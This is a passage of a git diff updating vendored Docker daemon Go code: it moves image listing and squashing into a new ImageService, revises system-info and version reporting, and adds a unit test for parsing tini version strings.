} // Images returns a filtered list of images. filterArgs is a JSON-encoded set @@ -42,7 +43,7 @@ func (daemon *Daemon) Map() map[image.ID]*image.Image { // filter is a shell glob string applied to repository names. The argument // named all controls whether all images in the graph are filtered, or just // the heads. -func (daemon *Daemon) Images(imageFilters filters.Args, all bool, withExtraAttrs bool) ([]*types.ImageSummary, error) { +func (i *ImageService) Images(imageFilters filters.Args, all bool, withExtraAttrs bool) ([]*types.ImageSummary, error) { var ( allImages map[image.ID]*image.Image err error @@ -53,22 +54,22 @@ func (daemon *Daemon) Images(imageFilters filters.Args, all bool, withExtraAttrs return nil, err } - if imageFilters.Include("dangling") { + if imageFilters.Contains("dangling") { if imageFilters.ExactMatch("dangling", "true") { danglingOnly = true } else if !imageFilters.ExactMatch("dangling", "false") { - return nil, fmt.Errorf("Invalid filter 'dangling=%s'", imageFilters.Get("dangling")) + return nil, invalidFilter{"dangling", imageFilters.Get("dangling")} } } if danglingOnly { - allImages = daemon.imageStore.Heads() + allImages = i.imageStore.Heads() } else { - allImages = daemon.imageStore.Map() + allImages = i.imageStore.Map() } var beforeFilter, sinceFilter *image.Image err = imageFilters.WalkValues("before", func(value string) error { - beforeFilter, err = daemon.GetImage(value) + beforeFilter, err = i.GetImage(value) return err }) if err != nil { @@ -76,7 +77,7 @@ func (daemon *Daemon) Images(imageFilters filters.Args, all bool, withExtraAttrs } err = imageFilters.WalkValues("since", func(value string) error { - sinceFilter, err = daemon.GetImage(value) + sinceFilter, err = i.GetImage(value) return err }) if err != nil { @@ -102,7 +103,7 @@ func (daemon *Daemon) Images(imageFilters filters.Args, all bool, withExtraAttrs } } - if imageFilters.Include("label") { + if imageFilters.Contains("label") { // Very old image that do not have 
image.Config (or even labels) if img.Config == nil { continue @@ -113,16 +114,28 @@ func (daemon *Daemon) Images(imageFilters filters.Args, all bool, withExtraAttrs } } + // Skip any images with an unsupported operating system to avoid a potential + // panic when indexing through the layerstore. Don't error as we want to list + // the other images. This should never happen, but here as a safety precaution. + if !system.IsOSSupported(img.OperatingSystem()) { + continue + } + layerID := img.RootFS.ChainID() var size int64 if layerID != "" { - l, err := daemon.layerStore.Get(layerID) + l, err := i.layerStores[img.OperatingSystem()].Get(layerID) if err != nil { + // The layer may have been deleted between the call to `Map()` or + // `Heads()` and the call to `Get()`, so we just ignore this error + if err == layer.ErrLayerDoesNotExist { + continue + } return nil, err } size, err = l.Size() - layer.ReleaseAndLog(daemon.layerStore, l) + layer.ReleaseAndLog(i.layerStores[img.OperatingSystem()], l) if err != nil { return nil, err } @@ -130,12 +143,12 @@ func (daemon *Daemon) Images(imageFilters filters.Args, all bool, withExtraAttrs newImage := newImage(img, size) - for _, ref := range daemon.referenceStore.References(id.Digest()) { - if imageFilters.Include("reference") { + for _, ref := range i.referenceStore.References(id.Digest()) { + if imageFilters.Contains("reference") { var found bool var matchErr error for _, pattern := range imageFilters.Get("reference") { - found, matchErr = reference.Match(pattern, ref) + found, matchErr = reference.FamiliarMatch(pattern, ref) if matchErr != nil { return nil, matchErr } @@ -145,20 +158,20 @@ func (daemon *Daemon) Images(imageFilters filters.Args, all bool, withExtraAttrs } } if _, ok := ref.(reference.Canonical); ok { - newImage.RepoDigests = append(newImage.RepoDigests, ref.String()) + newImage.RepoDigests = append(newImage.RepoDigests, reference.FamiliarString(ref)) } if _, ok := ref.(reference.NamedTagged); ok { - 
newImage.RepoTags = append(newImage.RepoTags, ref.String()) + newImage.RepoTags = append(newImage.RepoTags, reference.FamiliarString(ref)) } } if newImage.RepoDigests == nil && newImage.RepoTags == nil { - if all || len(daemon.imageStore.Children(id)) == 0 { + if all || len(i.imageStore.Children(id)) == 0 { - if imageFilters.Include("dangling") && !danglingOnly { + if imageFilters.Contains("dangling") && !danglingOnly { //dangling=false case, so dangling image is not needed continue } - if imageFilters.Include("reference") { // skip images with no references if filtering by reference + if imageFilters.Contains("reference") { // skip images with no references if filtering by reference continue } newImage.RepoDigests = []string{"@"} @@ -171,10 +184,10 @@ func (daemon *Daemon) Images(imageFilters filters.Args, all bool, withExtraAttrs } if withExtraAttrs { - // lazyly init variables + // lazily init variables if imagesMap == nil { - allContainers = daemon.List() - allLayers = daemon.layerStore.Map() + allContainers = i.containers.List() + allLayers = i.layerStores[img.OperatingSystem()].Map() imagesMap = make(map[*image.Image]*types.ImageSummary) layerRefs = make(map[layer.ChainID]int) } @@ -236,16 +249,20 @@ func (daemon *Daemon) Images(imageFilters filters.Args, all bool, withExtraAttrs // This new image contains only the layers from it's parent + 1 extra layer which contains the diff of all the layers in between. // The existing image(s) is not destroyed. // If no parent is specified, a new image with the diff of all the specified image's layers merged into a new layer that has no parents. 
-func (daemon *Daemon) SquashImage(id, parent string) (string, error) { - img, err := daemon.imageStore.Get(image.ID(id)) - if err != nil { +func (i *ImageService) SquashImage(id, parent string) (string, error) { + + var ( + img *image.Image + err error + ) + if img, err = i.imageStore.Get(image.ID(id)); err != nil { return "", err } var parentImg *image.Image var parentChainID layer.ChainID if len(parent) != 0 { - parentImg, err = daemon.imageStore.Get(image.ID(parent)) + parentImg, err = i.imageStore.Get(image.ID(parent)) if err != nil { return "", errors.Wrap(err, "error getting specified parent layer") } @@ -254,12 +271,14 @@ func (daemon *Daemon) SquashImage(id, parent string) (string, error) { rootFS := image.NewRootFS() parentImg = &image.Image{RootFS: rootFS} } - - l, err := daemon.layerStore.Get(img.RootFS.ChainID()) + if !system.IsOSSupported(img.OperatingSystem()) { + return "", errors.Wrap(err, system.ErrNotSupportedOperatingSystem.Error()) + } + l, err := i.layerStores[img.OperatingSystem()].Get(img.RootFS.ChainID()) if err != nil { return "", errors.Wrap(err, "error getting image layer") } - defer daemon.layerStore.Release(l) + defer i.layerStores[img.OperatingSystem()].Release(l) ts, err := l.TarStreamFrom(parentChainID) if err != nil { @@ -267,18 +286,16 @@ func (daemon *Daemon) SquashImage(id, parent string) (string, error) { } defer ts.Close() - newL, err := daemon.layerStore.Register(ts, parentChainID) + newL, err := i.layerStores[img.OperatingSystem()].Register(ts, parentChainID) if err != nil { return "", errors.Wrap(err, "error registering layer") } - defer daemon.layerStore.Release(newL) + defer i.layerStores[img.OperatingSystem()].Release(newL) - var newImage image.Image - newImage = *img + newImage := *img newImage.RootFS = nil - var rootFS image.RootFS - rootFS = *parentImg.RootFS + rootFS := *parentImg.RootFS rootFS.DiffIDs = append(rootFS.DiffIDs, newL.DiffID()) newImage.RootFS = &rootFS @@ -308,20 +325,20 @@ func (daemon *Daemon) 
SquashImage(id, parent string) (string, error) { return "", errors.Wrap(err, "error marshalling image config") } - newImgID, err := daemon.imageStore.Create(b) + newImgID, err := i.imageStore.Create(b) if err != nil { return "", errors.Wrap(err, "error creating new image after squash") } return string(newImgID), nil } -func newImage(image *image.Image, virtualSize int64) *types.ImageSummary { +func newImage(image *image.Image, size int64) *types.ImageSummary { newImage := new(types.ImageSummary) newImage.ParentID = image.Parent.String() newImage.ID = image.ID().String() newImage.Created = image.Created.Unix() - newImage.Size = virtualSize - newImage.VirtualSize = virtualSize + newImage.Size = size + newImage.VirtualSize = size newImage.SharedSize = -1 newImage.Containers = -1 if image.Config != nil { diff --git a/vendor/github.com/docker/docker/daemon/images/locals.go b/vendor/github.com/docker/docker/daemon/images/locals.go new file mode 100644 index 0000000000..5ffc460a09 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/images/locals.go @@ -0,0 +1,32 @@ +package images // import "github.com/docker/docker/daemon/images" + +import ( + "fmt" + + "github.com/docker/go-metrics" +) + +type invalidFilter struct { + filter string + value interface{} +} + +func (e invalidFilter) Error() string { + msg := "Invalid filter '" + e.filter + if e.value != nil { + msg += fmt.Sprintf("=%s", e.value) + } + return msg + "'" +} + +func (e invalidFilter) InvalidParameter() {} + +var imageActions metrics.LabeledTimer + +func init() { + ns := metrics.NewNamespace("engine", "daemon", nil) + imageActions = ns.NewLabeledTimer("image_actions", "The number of seconds it takes to process each image action", "action") + // TODO: is it OK to register a namespace with the same name? Or does this + // need to be exported from somewhere? 
+ metrics.Register(ns) +} diff --git a/vendor/github.com/docker/docker/daemon/images/service.go b/vendor/github.com/docker/docker/daemon/images/service.go new file mode 100644 index 0000000000..263217dccd --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/images/service.go @@ -0,0 +1,251 @@ +package images // import "github.com/docker/docker/daemon/images" + +import ( + "context" + "os" + "runtime" + + "github.com/docker/docker/container" + daemonevents "github.com/docker/docker/daemon/events" + "github.com/docker/docker/distribution" + "github.com/docker/docker/distribution/metadata" + "github.com/docker/docker/distribution/xfer" + "github.com/docker/docker/image" + "github.com/docker/docker/layer" + dockerreference "github.com/docker/docker/reference" + "github.com/docker/docker/registry" + "github.com/docker/libtrust" + "github.com/opencontainers/go-digest" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" +) + +type containerStore interface { + // used by image delete + First(container.StoreFilter) *container.Container + // used by image prune, and image list + List() []*container.Container + // TODO: remove, only used for CommitBuildStep + Get(string) *container.Container +} + +// ImageServiceConfig is the configuration used to create a new ImageService +type ImageServiceConfig struct { + ContainerStore containerStore + DistributionMetadataStore metadata.Store + EventsService *daemonevents.Events + ImageStore image.Store + LayerStores map[string]layer.Store + MaxConcurrentDownloads int + MaxConcurrentUploads int + ReferenceStore dockerreference.Store + RegistryService registry.Service + TrustKey libtrust.PrivateKey +} + +// NewImageService returns a new ImageService from a configuration +func NewImageService(config ImageServiceConfig) *ImageService { + logrus.Debugf("Max Concurrent Downloads: %d", config.MaxConcurrentDownloads) + logrus.Debugf("Max Concurrent Uploads: %d", config.MaxConcurrentUploads) + return &ImageService{ + containers: 
config.ContainerStore, + distributionMetadataStore: config.DistributionMetadataStore, + downloadManager: xfer.NewLayerDownloadManager(config.LayerStores, config.MaxConcurrentDownloads), + eventsService: config.EventsService, + imageStore: config.ImageStore, + layerStores: config.LayerStores, + referenceStore: config.ReferenceStore, + registryService: config.RegistryService, + trustKey: config.TrustKey, + uploadManager: xfer.NewLayerUploadManager(config.MaxConcurrentUploads), + } +} + +// ImageService provides a backend for image management +type ImageService struct { + containers containerStore + distributionMetadataStore metadata.Store + downloadManager *xfer.LayerDownloadManager + eventsService *daemonevents.Events + imageStore image.Store + layerStores map[string]layer.Store // By operating system + pruneRunning int32 + referenceStore dockerreference.Store + registryService registry.Service + trustKey libtrust.PrivateKey + uploadManager *xfer.LayerUploadManager +} + +// DistributionServices provides daemon image storage services +type DistributionServices struct { + DownloadManager distribution.RootFSDownloadManager + V2MetadataService metadata.V2MetadataService + LayerStore layer.Store // TODO: lcow + ImageStore image.Store + ReferenceStore dockerreference.Store +} + +// DistributionServices return services controlling daemon image storage +func (i *ImageService) DistributionServices() DistributionServices { + return DistributionServices{ + DownloadManager: i.downloadManager, + V2MetadataService: metadata.NewV2MetadataService(i.distributionMetadataStore), + LayerStore: i.layerStores[runtime.GOOS], + ImageStore: i.imageStore, + ReferenceStore: i.referenceStore, + } +} + +// CountImages returns the number of images stored by ImageService +// called from info.go +func (i *ImageService) CountImages() int { + return i.imageStore.Len() +} + +// Children returns the children image.IDs for a parent image. 
+// called from list.go to filter containers +// TODO: refactor to expose an ancestry for image.ID? +func (i *ImageService) Children(id image.ID) []image.ID { + return i.imageStore.Children(id) +} + +// CreateLayer creates a filesystem layer for a container. +// called from create.go +// TODO: accept an opt struct instead of container? +func (i *ImageService) CreateLayer(container *container.Container, initFunc layer.MountInit) (layer.RWLayer, error) { + var layerID layer.ChainID + if container.ImageID != "" { + img, err := i.imageStore.Get(container.ImageID) + if err != nil { + return nil, err + } + layerID = img.RootFS.ChainID() + } + + rwLayerOpts := &layer.CreateRWLayerOpts{ + MountLabel: container.MountLabel, + InitFunc: initFunc, + StorageOpt: container.HostConfig.StorageOpt, + } + + // Indexing by OS is safe here as validation of OS has already been performed in create() (the only + // caller), and guaranteed non-nil + return i.layerStores[container.OS].CreateRWLayer(container.ID, layerID, rwLayerOpts) +} + +// GetLayerByID returns a layer by ID and operating system +// called from daemon.go Daemon.restore(), and Daemon.containerExport() +func (i *ImageService) GetLayerByID(cid string, os string) (layer.RWLayer, error) { + return i.layerStores[os].GetRWLayer(cid) +} + +// LayerStoreStatus returns the status for each layer store +// called from info.go +func (i *ImageService) LayerStoreStatus() map[string][][2]string { + result := make(map[string][][2]string) + for os, store := range i.layerStores { + result[os] = store.DriverStatus() + } + return result +} + +// GetLayerMountID returns the mount ID for a layer +// called from daemon.go Daemon.Shutdown(), and Daemon.Cleanup() (cleanup is actually continerCleanup) +// TODO: needs to be refactored to Unmount (see callers), or removed and replaced +// with GetLayerByID +func (i *ImageService) GetLayerMountID(cid string, os string) (string, error) { + return i.layerStores[os].GetMountID(cid) +} + +// Cleanup 
resources before the process is shutdown. +// called from daemon.go Daemon.Shutdown() +func (i *ImageService) Cleanup() { + for os, ls := range i.layerStores { + if ls != nil { + if err := ls.Cleanup(); err != nil { + logrus.Errorf("Error during layer Store.Cleanup(): %v %s", err, os) + } + } + } +} + +// GraphDriverForOS returns the name of the graph drvier +// moved from Daemon.GraphDriverName, used by: +// - newContainer +// - to report an error in Daemon.Mount(container) +func (i *ImageService) GraphDriverForOS(os string) string { + return i.layerStores[os].DriverName() +} + +// ReleaseLayer releases a layer allowing it to be removed +// called from delete.go Daemon.cleanupContainer(), and Daemon.containerExport() +func (i *ImageService) ReleaseLayer(rwlayer layer.RWLayer, containerOS string) error { + metadata, err := i.layerStores[containerOS].ReleaseRWLayer(rwlayer) + layer.LogReleaseMetadata(metadata) + if err != nil && err != layer.ErrMountDoesNotExist && !os.IsNotExist(errors.Cause(err)) { + return errors.Wrapf(err, "driver %q failed to remove root filesystem", + i.layerStores[containerOS].DriverName()) + } + return nil +} + +// LayerDiskUsage returns the number of bytes used by layer stores +// called from disk_usage.go +func (i *ImageService) LayerDiskUsage(ctx context.Context) (int64, error) { + var allLayersSize int64 + layerRefs := i.getLayerRefs() + for _, ls := range i.layerStores { + allLayers := ls.Map() + for _, l := range allLayers { + select { + case <-ctx.Done(): + return allLayersSize, ctx.Err() + default: + size, err := l.DiffSize() + if err == nil { + if _, ok := layerRefs[l.ChainID()]; ok { + allLayersSize += size + } else { + logrus.Warnf("found leaked image layer %v", l.ChainID()) + } + } else { + logrus.Warnf("failed to get diff size for layer %v", l.ChainID()) + } + } + } + } + return allLayersSize, nil +} + +func (i *ImageService) getLayerRefs() map[layer.ChainID]int { + tmpImages := i.imageStore.Map() + layerRefs := 
map[layer.ChainID]int{} + for id, img := range tmpImages { + dgst := digest.Digest(id) + if len(i.referenceStore.References(dgst)) == 0 && len(i.imageStore.Children(id)) != 0 { + continue + } + + rootFS := *img.RootFS + rootFS.DiffIDs = nil + for _, id := range img.RootFS.DiffIDs { + rootFS.Append(id) + chid := rootFS.ChainID() + layerRefs[chid]++ + } + } + + return layerRefs +} + +// UpdateConfig values +// +// called from reload.go +func (i *ImageService) UpdateConfig(maxDownloads, maxUploads *int) { + if i.downloadManager != nil && maxDownloads != nil { + i.downloadManager.SetConcurrency(*maxDownloads) + } + if i.uploadManager != nil && maxUploads != nil { + i.uploadManager.SetConcurrency(*maxUploads) + } +} diff --git a/vendor/github.com/docker/docker/daemon/info.go b/vendor/github.com/docker/docker/daemon/info.go index 1ab9f29592..7b011fe324 100644 --- a/vendor/github.com/docker/docker/daemon/info.go +++ b/vendor/github.com/docker/docker/daemon/info.go @@ -1,16 +1,16 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "fmt" "os" "runtime" - "sync/atomic" + "strings" "time" - "github.com/Sirupsen/logrus" "github.com/docker/docker/api" "github.com/docker/docker/api/types" - "github.com/docker/docker/container" + "github.com/docker/docker/cli/debug" + "github.com/docker/docker/daemon/logger" "github.com/docker/docker/dockerversion" "github.com/docker/docker/pkg/fileutils" "github.com/docker/docker/pkg/parsers/kernel" @@ -19,9 +19,8 @@ import ( "github.com/docker/docker/pkg/sysinfo" "github.com/docker/docker/pkg/system" "github.com/docker/docker/registry" - "github.com/docker/docker/utils" - "github.com/docker/docker/volume/drivers" "github.com/docker/go-connections/sockets" + "github.com/sirupsen/logrus" ) // SystemInfo returns information about the host server the daemon is running on. 
@@ -57,18 +56,7 @@ func (daemon *Daemon) SystemInfo() (*types.Info, error) { } sysInfo := sysinfo.New(true) - - var cRunning, cPaused, cStopped int32 - daemon.containers.ApplyAll(func(c *container.Container) { - switch c.StateString() { - case "paused": - atomic.AddInt32(&cPaused, 1) - case "running": - atomic.AddInt32(&cRunning, 1) - default: - atomic.AddInt32(&cStopped, 1) - } - }) + cRunning, cPaused, cStopped := stateCtr.get() securityOptions := []string{} if sysInfo.AppArmor { @@ -84,25 +72,37 @@ func (daemon *Daemon) SystemInfo() (*types.Info, error) { if selinuxEnabled() { securityOptions = append(securityOptions, "name=selinux") } - uid, gid := daemon.GetRemappedUIDGID() - if uid != 0 || gid != 0 { + rootIDs := daemon.idMappings.RootPair() + if rootIDs.UID != 0 || rootIDs.GID != 0 { securityOptions = append(securityOptions, "name=userns") } + var ds [][2]string + drivers := "" + statuses := daemon.imageService.LayerStoreStatus() + for os, gd := range daemon.graphDrivers { + ds = append(ds, statuses[os]...) 
+ drivers += gd + if len(daemon.graphDrivers) > 1 { + drivers += fmt.Sprintf(" (%s) ", os) + } + } + drivers = strings.TrimSpace(drivers) + v := &types.Info{ ID: daemon.ID, - Containers: int(cRunning + cPaused + cStopped), - ContainersRunning: int(cRunning), - ContainersPaused: int(cPaused), - ContainersStopped: int(cStopped), - Images: len(daemon.imageStore.Map()), - Driver: daemon.GraphDriverName(), - DriverStatus: daemon.layerStore.DriverStatus(), + Containers: cRunning + cPaused + cStopped, + ContainersRunning: cRunning, + ContainersPaused: cPaused, + ContainersStopped: cStopped, + Images: daemon.imageService.CountImages(), + Driver: drivers, + DriverStatus: ds, Plugins: daemon.showPluginsInfo(), IPv4Forwarding: !sysInfo.IPv4ForwardingDisabled, BridgeNfIptables: !sysInfo.BridgeNFCallIPTablesDisabled, BridgeNfIP6tables: !sysInfo.BridgeNFCallIP6TablesDisabled, - Debug: utils.IsDebugEnabled(), + Debug: debug.IsEnabled(), NFd: fileutils.GetTotalUsedFds(), NGoroutines: runtime.NumGoroutine(), SystemTime: time.Now().Format(time.RFC3339Nano), @@ -117,6 +117,7 @@ func (daemon *Daemon) SystemInfo() (*types.Info, error) { RegistryConfig: daemon.RegistryService.ServiceConfig(), NCPU: sysinfo.NumCPU(), MemTotal: meminfo.MemTotal, + GenericResources: daemon.genericResources, DockerRootDir: daemon.configStore.Root, Labels: daemon.configStore.Labels, ExperimentalBuild: daemon.configStore.Experimental, @@ -147,24 +148,46 @@ func (daemon *Daemon) SystemInfo() (*types.Info, error) { // SystemVersion returns version information about the daemon. 
func (daemon *Daemon) SystemVersion() types.Version { + kernelVersion := "" + if kv, err := kernel.GetKernelVersion(); err != nil { + logrus.Warnf("Could not get kernel version: %v", err) + } else { + kernelVersion = kv.String() + } + v := types.Version{ + Components: []types.ComponentVersion{ + { + Name: "Engine", + Version: dockerversion.Version, + Details: map[string]string{ + "GitCommit": dockerversion.GitCommit, + "ApiVersion": api.DefaultVersion, + "MinAPIVersion": api.MinVersion, + "GoVersion": runtime.Version(), + "Os": runtime.GOOS, + "Arch": runtime.GOARCH, + "BuildTime": dockerversion.BuildTime, + "KernelVersion": kernelVersion, + "Experimental": fmt.Sprintf("%t", daemon.configStore.Experimental), + }, + }, + }, + + // Populate deprecated fields for older clients Version: dockerversion.Version, GitCommit: dockerversion.GitCommit, + APIVersion: api.DefaultVersion, MinAPIVersion: api.MinVersion, GoVersion: runtime.Version(), Os: runtime.GOOS, Arch: runtime.GOARCH, BuildTime: dockerversion.BuildTime, + KernelVersion: kernelVersion, Experimental: daemon.configStore.Experimental, } - kernelVersion := "" - if kv, err := kernel.GetKernelVersion(); err != nil { - logrus.Warnf("Could not get kernel version: %v", err) - } else { - kernelVersion = kv.String() - } - v.KernelVersion = kernelVersion + v.Platform.Name = dockerversion.PlatformName return v } @@ -172,9 +195,12 @@ func (daemon *Daemon) SystemVersion() types.Version { func (daemon *Daemon) showPluginsInfo() types.PluginsInfo { var pluginsInfo types.PluginsInfo - pluginsInfo.Volume = volumedrivers.GetDriverList() + pluginsInfo.Volume = daemon.volumes.GetDriverList() pluginsInfo.Network = daemon.GetNetworkDriverList() + // The authorization plugins are returned in the order they are + // used as they constitute a request/response modification chain. 
pluginsInfo.Authorization = daemon.configStore.AuthorizationPlugins + pluginsInfo.Log = logger.ListDrivers() return pluginsInfo } diff --git a/vendor/github.com/docker/docker/daemon/info_unix.go b/vendor/github.com/docker/docker/daemon/info_unix.go index 9c41c0e4cd..56be9c06fb 100644 --- a/vendor/github.com/docker/docker/daemon/info_unix.go +++ b/vendor/github.com/docker/docker/daemon/info_unix.go @@ -1,16 +1,17 @@ // +build !windows -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "context" "os/exec" "strings" - "github.com/Sirupsen/logrus" "github.com/docker/docker/api/types" "github.com/docker/docker/dockerversion" "github.com/docker/docker/pkg/sysinfo" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) // FillPlatformInfo fills the platform related info. @@ -27,16 +28,9 @@ func (daemon *Daemon) FillPlatformInfo(v *types.Info, sysInfo *sysinfo.SysInfo) v.DefaultRuntime = daemon.configStore.GetDefaultRuntimeName() v.InitBinary = daemon.configStore.GetInitPath() - v.ContainerdCommit.Expected = dockerversion.ContainerdCommitID - if sv, err := daemon.containerd.GetServerVersion(context.Background()); err == nil { - v.ContainerdCommit.ID = sv.Revision - } else { - logrus.Warnf("failed to retrieve containerd version: %v", err) - v.ContainerdCommit.ID = "N/A" - } - v.RuncCommit.Expected = dockerversion.RuncCommitID - if rv, err := exec.Command(DefaultRuntimeBinary, "--version").Output(); err == nil { + defaultRuntimeBinary := daemon.configStore.GetRuntime(v.DefaultRuntime).Path + if rv, err := exec.Command(defaultRuntimeBinary, "--version").Output(); err == nil { parts := strings.Split(strings.TrimSpace(string(rv)), "\n") if len(parts) == 3 { parts = strings.Split(parts[1], ": ") @@ -46,37 +40,54 @@ func (daemon *Daemon) FillPlatformInfo(v *types.Info, sysInfo *sysinfo.SysInfo) } if v.RuncCommit.ID == "" { - logrus.Warnf("failed to retrieve %s version: unknown output format: %s", DefaultRuntimeBinary, string(rv)) + 
logrus.Warnf("failed to retrieve %s version: unknown output format: %s", defaultRuntimeBinary, string(rv)) v.RuncCommit.ID = "N/A" } } else { - logrus.Warnf("failed to retrieve %s version: %v", DefaultRuntimeBinary, err) + logrus.Warnf("failed to retrieve %s version: %v", defaultRuntimeBinary, err) v.RuncCommit.ID = "N/A" } - v.InitCommit.Expected = dockerversion.InitCommitID - if rv, err := exec.Command(DefaultInitBinary, "--version").Output(); err == nil { - parts := strings.Split(strings.TrimSpace(string(rv)), " - ") - if len(parts) == 2 { - if dockerversion.InitCommitID[0] == 'v' { - vs := strings.TrimPrefix(parts[0], "tini version ") - v.InitCommit.ID = "v" + vs - } else { - // Get the sha1 - gitParts := strings.Split(parts[1], ".") - if len(gitParts) == 2 && gitParts[0] == "git" { - v.InitCommit.ID = gitParts[1] - v.InitCommit.Expected = dockerversion.InitCommitID[0:len(gitParts[1])] - } - } - } + v.ContainerdCommit.Expected = dockerversion.ContainerdCommitID + if rv, err := daemon.containerd.Version(context.Background()); err == nil { + v.ContainerdCommit.ID = rv.Revision + } else { + logrus.Warnf("failed to retrieve containerd version: %v", err) + v.ContainerdCommit.ID = "N/A" + } + + defaultInitBinary := daemon.configStore.GetInitPath() + if rv, err := exec.Command(defaultInitBinary, "--version").Output(); err == nil { + ver, err := parseInitVersion(string(rv)) - if v.InitCommit.ID == "" { - logrus.Warnf("failed to retrieve %s version: unknown output format: %s", DefaultInitBinary, string(rv)) - v.InitCommit.ID = "N/A" + if err != nil { + logrus.Warnf("failed to retrieve %s version: %s", defaultInitBinary, err) } + v.InitCommit = ver } else { - logrus.Warnf("failed to retrieve %s version", DefaultInitBinary) + logrus.Warnf("failed to retrieve %s version: %s", defaultInitBinary, err) v.InitCommit.ID = "N/A" } } + +// parseInitVersion parses a Tini version string, and extracts the version. 
+func parseInitVersion(v string) (types.Commit, error) { + version := types.Commit{ID: "", Expected: dockerversion.InitCommitID} + parts := strings.Split(strings.TrimSpace(v), " - ") + + if len(parts) >= 2 { + gitParts := strings.Split(parts[1], ".") + if len(gitParts) == 2 && gitParts[0] == "git" { + version.ID = gitParts[1] + version.Expected = dockerversion.InitCommitID[0:len(version.ID)] + } + } + if version.ID == "" && strings.HasPrefix(parts[0], "tini version ") { + version.ID = "v" + strings.TrimPrefix(parts[0], "tini version ") + } + if version.ID == "" { + version.ID = "N/A" + return version, errors.Errorf("unknown output format: %s", v) + } + return version, nil +} diff --git a/vendor/github.com/docker/docker/daemon/info_unix_test.go b/vendor/github.com/docker/docker/daemon/info_unix_test.go new file mode 100644 index 0000000000..a5a4e06f98 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/info_unix_test.go @@ -0,0 +1,53 @@ +// +build !windows + +package daemon // import "github.com/docker/docker/daemon" + +import ( + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/dockerversion" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestParseInitVersion(t *testing.T) { + tests := []struct { + version string + result types.Commit + invalid bool + }{ + { + version: "tini version 0.13.0 - git.949e6fa", + result: types.Commit{ID: "949e6fa", Expected: dockerversion.InitCommitID[0:7]}, + }, { + version: "tini version 0.13.0\n", + result: types.Commit{ID: "v0.13.0", Expected: dockerversion.InitCommitID}, + }, { + version: "tini version 0.13.2", + result: types.Commit{ID: "v0.13.2", Expected: dockerversion.InitCommitID}, + }, { + version: "tini version0.13.2", + result: types.Commit{ID: "N/A", Expected: dockerversion.InitCommitID}, + invalid: true, + }, { + version: "", + result: types.Commit{ID: "N/A", Expected: dockerversion.InitCommitID}, + invalid: true, + }, { + version: "hello world", + result: 
types.Commit{ID: "N/A", Expected: dockerversion.InitCommitID}, + invalid: true, + }, + } + + for _, test := range tests { + ver, err := parseInitVersion(string(test.version)) + if test.invalid { + assert.Check(t, is.ErrorContains(err, "")) + } else { + assert.Check(t, err) + } + assert.Check(t, is.DeepEqual(test.result, ver)) + } +} diff --git a/vendor/github.com/docker/docker/daemon/info_windows.go b/vendor/github.com/docker/docker/daemon/info_windows.go index c700911eb0..e452369fc8 100644 --- a/vendor/github.com/docker/docker/daemon/info_windows.go +++ b/vendor/github.com/docker/docker/daemon/info_windows.go @@ -1,4 +1,4 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "github.com/docker/docker/api/types" diff --git a/vendor/github.com/docker/docker/daemon/initlayer/setup_solaris.go b/vendor/github.com/docker/docker/daemon/initlayer/setup_solaris.go deleted file mode 100644 index 66d53f0eef..0000000000 --- a/vendor/github.com/docker/docker/daemon/initlayer/setup_solaris.go +++ /dev/null @@ -1,13 +0,0 @@ -// +build solaris,cgo - -package initlayer - -// Setup populates a directory with mountpoints suitable -// for bind-mounting dockerinit into the container. The mountpoint is simply an -// empty file at /.dockerinit -// -// This extra layer is used by all containers as the top-most ro layer. It protects -// the container from unwanted side-effects on the rw layer. 
-func Setup(initLayer string, rootUID, rootGID int) error { - return nil -} diff --git a/vendor/github.com/docker/docker/daemon/initlayer/setup_unix.go b/vendor/github.com/docker/docker/daemon/initlayer/setup_unix.go index e83c2751ed..035f62075f 100644 --- a/vendor/github.com/docker/docker/daemon/initlayer/setup_unix.go +++ b/vendor/github.com/docker/docker/daemon/initlayer/setup_unix.go @@ -1,14 +1,15 @@ // +build linux freebsd -package initlayer +package initlayer // import "github.com/docker/docker/daemon/initlayer" import ( "os" "path/filepath" "strings" - "syscall" + "github.com/docker/docker/pkg/containerfs" "github.com/docker/docker/pkg/idtools" + "golang.org/x/sys/unix" ) // Setup populates a directory with mountpoints suitable @@ -16,7 +17,10 @@ import ( // // This extra layer is used by all containers as the top-most ro layer. It protects // the container from unwanted side-effects on the rw layer. -func Setup(initLayer string, rootUID, rootGID int) error { +func Setup(initLayerFs containerfs.ContainerFS, rootIDs idtools.IDPair) error { + // Since all paths are local to the container, we can just extract initLayerFs.Path() + initLayer := initLayerFs.Path() + for pth, typ := range map[string]string{ "/dev/pts": "dir", "/dev/shm": "dir", @@ -33,17 +37,17 @@ func Setup(initLayer string, rootUID, rootGID int) error { prev := "/" for _, p := range parts[1:] { prev = filepath.Join(prev, p) - syscall.Unlink(filepath.Join(initLayer, prev)) + unix.Unlink(filepath.Join(initLayer, prev)) } if _, err := os.Stat(filepath.Join(initLayer, pth)); err != nil { if os.IsNotExist(err) { - if err := idtools.MkdirAllNewAs(filepath.Join(initLayer, filepath.Dir(pth)), 0755, rootUID, rootGID); err != nil { + if err := idtools.MkdirAllAndChownNew(filepath.Join(initLayer, filepath.Dir(pth)), 0755, rootIDs); err != nil { return err } switch typ { case "dir": - if err := idtools.MkdirAllNewAs(filepath.Join(initLayer, pth), 0755, rootUID, rootGID); err != nil { + if err := 
